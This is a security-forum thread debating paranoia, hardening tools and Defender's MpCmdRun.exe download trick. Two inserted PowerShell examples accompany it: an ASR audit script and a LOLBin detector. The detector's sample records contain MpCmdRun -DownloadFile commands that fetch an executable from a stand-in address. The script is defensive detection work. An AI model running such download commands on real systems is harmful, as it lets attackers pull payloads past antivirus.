Microsoft Defender can ironically be used to download malware


Andy Ful

From Hard_Configurator Tools
I am afraid that the only reasonable solution for people paranoid about computer security is learning how to be less paranoid. This cannot be accomplished by changing the security software after reading about new LOLBins, new fileless malware, new ransomware, new exploits, etc. Reading is not enough without proper understanding. The understanding will follow gradually when discussing the security problems with other members, software developers, security experienced users, etc. :unsure:
 

danb

From VoodooShield
Thread author
Honestly, defining paranoia in cybersecurity is really all about perspective. What some people define as being paranoid, others would define as being smart. No offense to anyone, but for example, my perspective of the system hardening tools is that they are all full-time, static, overkill tweaking tools that make serious changes to the system, break vital system operations (such as the recent Intel driver update that we all saw), require undocumented hacks, and some are ancient, deprecated tech that ultimately only offers user-space protection. In addition, if the user is unable to properly and effectively use the product on their own, and therefore requires assistance from an advanced user, or in the enterprise requires co-management of the web management console (by the cybersecurity vendor), many people would think this is ridiculous. So from my perspective, that is being paranoid and not smart about cybersecurity.

Then there are also tools that offer kind of a “half-lock” by somewhat hardening the system. From my perspective, these tools are just as ridiculous because any good AV has already added these rules and features, there is a high probability that the anti-exploit mechanism is not working properly, and to put it simply, malware does not discriminate. In other words, as a user, you are presented with tons of different rules, and you get to manually select which rules you wish to enforce because obviously you know what malware is going to attack you ;).

Then when it comes to VS, some people’s perspective is that it is overkill and only paranoid people should run VS. From the perspective of myself and the people who understand what VS is all about, they do not see using VS as paranoid at all. They and I believe that it is perfectly reasonable to lock the computer when it is at risk, and that there is never a good reason to run non-whitelisted executable code when the computer is at risk. We further believe that sealing up and securing every nook and cranny in your house while neglecting to lock the front door is absolute insanity.

So ultimately, it really is all about perspective.

Anyway, all I have ever heard about VS is that it is overkill, but no one ever took the time to explain specifically why it is overkill and unnecessary, like I just did above. They just lazily suggest that VS is overkill without explaining why. So if anyone would like to explain this, I would love to hear your perspective on why you think locking the computer when it is at risk is overkill. And please, do not hold back, let me have it ;).
 

Andy Ful

From Hard_Configurator Tools
danb said:
Honestly, defining paranoia in cybersecurity is really all about perspective. What some people define as being paranoid, others would define as being smart.
...
Many MT members are "slightly paranoid" (quotes are important). It means that they try different security solutions by curiosity to discover something close to perfection. If we talk about real cybersecurity paranoia, it is caused by fear and there is nothing smart in it - also the perspective is wrong. I think that the right perspective can be established by learning the roots of fear. Anyway, I am not a psychiatrist so maybe there is another more correct explanation.

danb said:
No offense to anyone, but for example, my perspective of the system hardening tools is that they are all fulltime, static, overkill tweaking tools that make serious changes to the system, break vital system operations (such as the recent Intel driver update that we all saw), require undocumented hacks, some are an ancient deprecated tech that ultimately only offer user-space protection.
That is true especially for home users who want to transfer the hardening used sometimes in enterprises (via GPO or reg tweaks). But, you slightly oversimplify the problem. One can apply light hardening which is perfectly documented by Microsoft and does not cause problems. Even Microsoft does it in WD via ASR rules. The point is to see the difference between overkill and advantage.
There is no place to discuss this problem here, because there are other more appropriate threads for that (for example the Hard_Configurator or SWH thread).
 
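Andy Ful's point above, that Microsoft itself ships documented hardening in Defender as ASR rules, can be made concrete. The PowerShell below is an added example written for this page; it is not code from the thread, from Hard_Configurator, from VoodooShield or from Microsoft. It uses only the documented Defender cmdlets (Add-MpPreference, Get-MpPreference, Get-WinEvent). The five rule GUIDs are Microsoft's published identifiers for those rules; choosing exactly these five as "light" hardening is this example's own assumption. The rules go into Audit mode first, so you can read what they would have blocked before promoting them to Block, which is the check that separates advantage from overkill.

```powershell
# Added example for this page (not from the thread, Hard_Configurator or Microsoft).
# Requires an elevated PowerShell on Windows 10/11 with Microsoft Defender as the
# active antivirus. Enables a small set of ASR rules in Audit mode, reads the
# effective state back, and lists the events the rules would have blocked.

# Published Microsoft ASR rule IDs -> names. Choosing these five as "light"
# hardening is this example's own assumption, not a Microsoft recommendation.
$AsrRules = @{
    'D4F940AB-401B-4EFC-AADC-AD5F3C50688A' = 'Block all Office applications from creating child processes'
    '3B576869-A4EC-4529-8536-B80A7769E899' = 'Block Office applications from creating executable content'
    'D3E037E1-3EB8-44C8-A917-57927947596D' = 'Block JavaScript or VBScript from launching downloaded executable content'
    'BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550' = 'Block executable content from email client and webmail'
    '9E6C4E1F-7D60-472F-BA1A-A39EF669E4B2' = 'Block credential stealing from LSASS'
}

function Set-AsrRuleMode {
    # Applies one action to a list of rule IDs. Add-MpPreference merges with
    # rules configured elsewhere (GPO, Intune, ConfigureDefender) instead of
    # replacing them, which is why it is used here rather than Set-MpPreference.
    param(
        [Parameter(Mandatory)][string[]]$Ids,
        [ValidateSet('Audit', 'Block', 'Disabled')][string]$Mode = 'Audit'
    )
    # Defender's own enum names for the three modes.
    $action  = @{ Audit = 'AuditMode'; Block = 'Enabled'; Disabled = 'Disabled' }[$Mode]
    $actions = [string[]]($Ids | ForEach-Object { $action })
    Add-MpPreference -AttackSurfaceReductionRules_Ids $Ids -AttackSurfaceReductionRules_Actions $actions
}

function Get-AsrRuleState {
    # Reads the effective configuration back; Ids[i] pairs with Actions[i].
    $pref  = Get-MpPreference
    $names = @{ 0 = 'Disabled'; 1 = 'Block'; 2 = 'Audit'; 6 = 'Warn' }
    for ($i = 0; $i -lt $pref.AttackSurfaceReductionRules_Ids.Count; $i++) {
        $id = $pref.AttackSurfaceReductionRules_Ids[$i]
        [pscustomobject]@{
            Id   = $id
            Mode = $names[[int]$pref.AttackSurfaceReductionRules_Actions[$i]]
            Name = if ($AsrRules.ContainsKey($id)) { $AsrRules[$id] } else { '(not in this list)' }
        }
    }
}

function Get-AsrHits {
    # Event 1121 = a rule blocked something; 1122 = a rule fired in Audit mode.
    # A week of 1122 events that contain nothing you actually use is the evidence
    # that promoting the rule to Block will not break your workflow.
    param([int]$Days = 7)
    Get-WinEvent -ErrorAction SilentlyContinue -FilterHashtable @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 1121, 1122
        StartTime = (Get-Date).AddDays(-$Days)
    } | Select-Object TimeCreated, Id, Message
}

# Usage: audit first, review the hits, then promote.
Set-AsrRuleMode -Ids ([string[]]$AsrRules.Keys) -Mode Audit
Get-AsrRuleState | Format-Table -AutoSize
Get-AsrHits | Format-List
# Set-AsrRuleMode -Ids ([string[]]$AsrRules.Keys) -Mode Block   # once the audit log is clean
```

Add-MpPreference is deliberately used instead of Set-MpPreference: Set-MpPreference replaces the whole rule list, which silently undoes rules pushed by policy or by a tool such as ConfigureDefender. If Defender is passive because a third-party AV owns real-time protection, the cmdlets succeed but the rules do nothing, so check Get-MpComputerStatus first.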

danb

From VoodooShield
Thread author
Andy Ful said:
Many MT members are "slightly paranoid" (quotes are important). It means that they try different security solutions by curiosity to discover something close to perfection. If we talk about real cybersecurity paranoia, it is caused by fear and there is nothing smart in it - also the perspective is wrong. I think that the right perspective can be established by learning the roots of fear. Anyway, I am not a psychiatrist so maybe there is another more correct explanation.


Andy Ful said:
That is true especially for home users who want to transfer the hardening used sometimes in enterprises (via GPO or reg tweaks). But, you slightly oversimplify the problem. One can apply light hardening which is perfectly documented by Microsoft and does not cause problems. Even Microsoft does it in WD via ASR rules. The point is to see the difference between overkill and advantage.
There is no place to discuss this problem here, because there are other more appropriate threads for that (for example the Hard_Configurator or SWH thread).
In my opinion, psychology and "learning the roots of fear" have no place in cybersecurity... there are psychology forums for that. Even if they did, light hardening will probably be less effective in solving a user's security paranoia disorder as opposed to deny-by-default. Having said that, if someone here is qualified to diagnose someone's security paranoid disorder, then great, that would be an interesting new thread.

And trying different security solutions is how we gain a perspective and form an opinion on the various products.
 

Andy Ful

From Hard_Configurator Tools
danb said:
In my opinion, psychology and "learning the roots of fear" has no place in cybersecurity...
...
It has. The roots of such fear are usually related to insufficient knowledge about security threats. Reading the articles about new threats can increase cybersecurity paranoia. Learning about threats can have the opposite effect. (y)
Changing the protection caused by fear only (after reading such articles) is an illusion of security.
 

danb

From VoodooShield
Thread author
Verified
Top Poster
Developer
Well-known
May 31, 2017
1,719
Andy Ful said:
It has. The roots of such fear are usually related to insufficient knowledge about security threats. Reading the articles about new threats can increase cybersecurity paranoia. Learning about threats can have the opposite effect. (y)
Changing the protection caused by fear only (after reading such articles) is an illusion of security.
How funny... if someone has a fear of flying, they do not read articles and research how the airplane security mechanisms protect them, right? ;).

I have worked directly with clients for 20 years now, so I have a very good understanding of how they view and understand cybersecurity. In a nutshell, they think AVs are a computer lock and they are immune to malware if they have an AV installed, otherwise they would not have asked me 500+ times over the years "I have antivirus software, how did I get a virus?".

Working with my clients for so long helped me to discover the concept of the toggling computer lock. VS was actually designed to provide the user comfort, and let them know their computer is locked when they are about ready to click on something they are unsure of. And when they asked me the above question that many times, I finally figured out that the best response I could give them was "your AV is a filter, it is not designed to catch every single threat." This is truly what VS is all about.

It is not an illusion of security if the computer is protected. Having said that, I will admit there is no such thing as bulletproof protection... but as you know, it is possible to lock things down pretty tight. The big question is... is the computer usable after it is locked down that tight ;).

Have a great weekend!
 

SearchLight

The best analogy to this ever ongoing debate is what I call the Toyota factor. If most reviews, and word of mouth endorsements say a Toyota is reliable, then most people will buy one because they don't want to be in for service often because it is proven.

I bet if WD wasn't bashed as often as it was in its infancy, and it still is, it would be more widely used today, and accepted like Avast or KSC for example. Unfortunately, the average PC user imo is also driven by a review, a reliability factor, and a set-and-forget type of attitude.

If more people would say that WD is just as good as any other AV free or paid, then it would just boil down to personal preference as to how one could maneuver within the GUI.

Anyone willing to make the statement?
 

Andy Ful

From Hard_Configurator Tools
@danb,
Did you read my posts carefully? I am saying that it is not reasonable to change the security (I had initially in mind the VS) to its alternative, because of reading (not understanding) the article about the new LOLBin. In your posts, you are trying to convince me that I am wrong. (y) :unsure:
Look again at some posts starting from the below post:
You are so touchy about the VS, that you sometimes fight the illusion.
 

plat

SearchLight said:
the average PC user imo is also driven by a review, and reliability factor, and a set, and forget type of attitude.

Hey, what's wrong with set-and-forget? I love it. 😇 This is my ever-elusive wish: to have Windows Security be set-and-forget and stay that way.

For justification for third party supplements for Defender (like VoodooShield, NVT SysHardener or Hard_Configurator), one need look no farther than the title of this thread. It's good sense. Too many people still view Defender like some kind of leprosy-infested pariah, to this very day. Defender is decent, but it ain't perfect out of the box. It's well-spent effort to beef it up. It can be done, pretty easily, with these tools. Ain't no paranoia around here.

Maybe instead of shopping for bulky, nosy antivirus products, let's go shopping and demo little-footprint Defender helpers. There are plenty around.
 

danb

From VoodooShield
Thread author
SearchLight said:
The best analogy to this ever ongoing debate is what I call the Toyota factor. If most reviews, and word of mouth endorsements say a Toyota is reliable, then most people will buy one because they don't want to be in for service often because it is proven.

I bet if WD wasn't bashed as often as it was in its infancy, and it still is, it would be more widely used today, and accepted like Avast or KSC for example. Unfortunately, the average PC user imo is also driven by a review, and reliability factor, and a set, and forget type of attitude.

If more people would say that WD is just as good as any other AV free or paid, then it would just boil down to personal preference as to how one could maneuver within the GUI.

Anyone wiling to make the statement?
I totally agree! If you hear something enough times you will eventually believe it. Having said that, WD is making a comeback.
 

danb

From VoodooShield
Thread author
Andy Ful said:
@danb,
Did you read my posts carefully? I am saying that it is not reasonable to change the security (I had initially in mind the VS) to its alternative, because of reading (not understanding) the article about the new LOLBin. In your posts, you are trying to convince me that I am wrong.(y):unsure:
Look again at some posts starting from the below post:
You are so touchy about the VS, that you sometimes fight the illusion.
I understood you perfectly. You are suggesting that people spend a lot of their precious time to learn about cybersecurity so they can become better informed and they will no longer fear cyber attacks. That is great if someone has an interest, inclination and time to make cybersecurity a hobby or maybe eventually a profession. But guess what... 99.999%+ of all people do not have an interest, an inclination or the time to learn about cybersecurity... they just want to be protected. You are biased because cybersecurity is your hobby, so you think everyone should take up cybersecurity as a hobby. And actually, with all of the misinformation online, it is probably not a good idea for novices to research cybersecurity threats until they have a good understanding of cybersecurity… it actually sounds dangerous to me for them to do so.

I realized this when my dentist was working on my teeth and he was saying "Dan, if people would just do these simple things and take the time to learn a little more about their teeth, then we wouldn't have these problems." And I looked up at him and said, "Doc, no offense but you have zero interest in learning about computers." We both instantly realized that people only worry about and take care of what is important to them.

As for the people with severe security paranoia disorder... I am not a psychologist, but it would make sense to me that they use an iPad or Chromebook instead, until they can get over their fears. For example, I am afraid of heights... I do not study Newton's theory of Gravity, I just simply try to avoid heights as much as possible.

BTW, this has absolutely nothing to do with VS. This has to do with you steering people in a direction that aligns with your interests and objectives. I would not say anything if they were being steered in a more protective direction, but they are being steered in a direction that could leave them vulnerable.
 

SpiderWeb

This is why I don't get why people use AVs on phones either. It's a massive attack vector sending your files across the internet, some of those files contain your password and credentials for other programs... There is so little upside to having unsandboxed AVs enabled.
 

JohnB

It is not "vulnerability" in WD, but rather "vulnerability" in Windows - it will work with any AV installed. It does not also decrease the protection of ConfigureDefender HIGH settings. The number of malware that can download something via LOLBins from the remote location will not be much greater. It is as true as introducing the new kind of expensive vodka does not increase the number of drinkers (some drinkers will stop drinking the Polish vodka and start drinking MpCmdRun vodka).
Using VS will add some protection to this setup, just like without MpCmdRun. (y)
Thanks for the info - Good to know.
 
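The download capability the thread title refers to is the MpCmdRun.exe -DownloadFile switch, reported in 2020 as a way to fetch a remote file with a signed Microsoft binary; the quoted post's point is that this is a LOLBin problem for any AV setup, not a weakness specific to Defender, and the practical answer on the detection side is to watch how MpCmdRun.exe is launched rather than to switch products. The PowerShell below is an added example written for this page, not code from the thread or from any vendor. It works on process-creation records reduced to three fields (Image, CommandLine, ParentImage), which is what Sysmon Event ID 1 or Security event 4688 provide; the four sample records are constructed for this example (198.51.100.7 and example.org are documentation addresses, the versioned platform path is illustrative), and the helper that maps a live Sysmon record onto those fields reads the event XML by field name so it does not depend on Sysmon's column order. Whether your current Defender platform build still honors the switch is something to verify on your own machine; the rules below stay useful for older builds and for an old MpCmdRun.exe copied out of the platform folder.

```powershell
# Added example for this page (not from the thread or any vendor). Flags process
# creations where MpCmdRun.exe is used as a downloader. Runs as-is in pwsh on
# any OS because the sample data is embedded; the last lines show live Sysmon use.

function Test-MpCmdRunDownload {
    # Input: objects with Image, CommandLine and ParentImage (strings).
    # Output: one object per suspicious record, listing the reasons it was flagged.
    param([Parameter(Mandatory, ValueFromPipeline)]$Record)
    process {
        if ($Record.Image -inotmatch '(^|[\\/])MpCmdRun\.exe$') { return }
        $reasons = @()
        if ($Record.CommandLine -imatch '(^|\s)-DownloadFile\b') {
            $reasons += 'uses the -DownloadFile switch'
        }
        if ($Record.CommandLine -imatch '(^|\s)-url\s+\S+') {
            $reasons += 'remote URL on the command line'
        }
        # The genuine binary lives in the Defender platform folder (or the older
        # Program Files location); a copy anywhere else is the relocated-LOLBin variant.
        if ($Record.Image -inotmatch '^[A-Za-z]:\\(ProgramData\\Microsoft\\Windows Defender\\Platform|Program Files\\Windows Defender)\\') {
            $reasons += 'MpCmdRun.exe running outside the Defender install directories'
        }
        # Defender's own scheduled runs are started by svchost/MsMpEng, not by shells.
        if ($Record.ParentImage -imatch '[\\/](cmd|powershell|pwsh|wscript|cscript|mshta|rundll32)\.exe$') {
            $reasons += "spawned by $($Record.ParentImage -replace '^.*[\\/]', '')"
        }
        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Image       = $Record.Image
                CommandLine = $Record.CommandLine
                Reasons     = $reasons -join '; '
            }
        }
    }
}

function ConvertFrom-SysmonProcessCreate {
    # Maps a live Sysmon Event ID 1 record onto the three fields above by reading
    # the event XML by field name (independent of Sysmon's property ordering).
    param([Parameter(Mandatory, ValueFromPipeline)]$Event)
    process {
        $data  = ([xml]$Event.ToXml()).Event.EventData.Data
        $field = { param($Name) ($data | Where-Object Name -eq $Name).'#text' }
        [pscustomobject]@{
            Image       = & $field 'Image'
            CommandLine = & $field 'CommandLine'
            ParentImage = & $field 'ParentImage'
        }
    }
}

# Constructed sample records (not real telemetry). 198.51.100.7 and example.org
# are documentation addresses; the versioned platform path is illustrative.
$Platform = 'C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2007.8-0\MpCmdRun.exe'
$SampleRecords = @(
    [pscustomobject]@{ Image       = $Platform                                   # routine Defender run
                       CommandLine = '"MpCmdRun.exe" -SignatureUpdate'
                       ParentImage = 'C:\Windows\System32\svchost.exe' }
    [pscustomobject]@{ Image       = $Platform                                   # genuine binary, abused
                       CommandLine = 'MpCmdRun.exe -DownloadFile -url http://198.51.100.7/p.exe -path C:\Users\Public\p.exe'
                       ParentImage = 'C:\Windows\System32\cmd.exe' }
    [pscustomobject]@{ Image       = 'C:\Users\Public\MpCmdRun.exe'             # copied out of the platform folder
                       CommandLine = 'MpCmdRun.exe -downloadfile -url https://example.org/a.txt -path C:\Users\Public\a.txt'
                       ParentImage = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' }
    [pscustomobject]@{ Image       = 'C:\Windows\System32\cmd.exe'              # unrelated process
                       CommandLine = 'cmd.exe /c dir'
                       ParentImage = 'C:\Windows\explorer.exe' }
)

$SampleRecords | Test-MpCmdRunDownload | Format-List

# Live data (Windows host with Sysmon installed):
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } |
#     ConvertFrom-SysmonProcessCreate | Test-MpCmdRunDownload
```

On the constructed sample, the second and third records are flagged (the third on all four counts) and the routine -SignatureUpdate run from svchost.exe produces nothing, which is the property to preserve when tuning: the signal is the combination of the download switch, a URL argument, an unusual image path and a shell parent, not the mere presence of MpCmdRun.exe, which runs on every Defender host several times a day.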
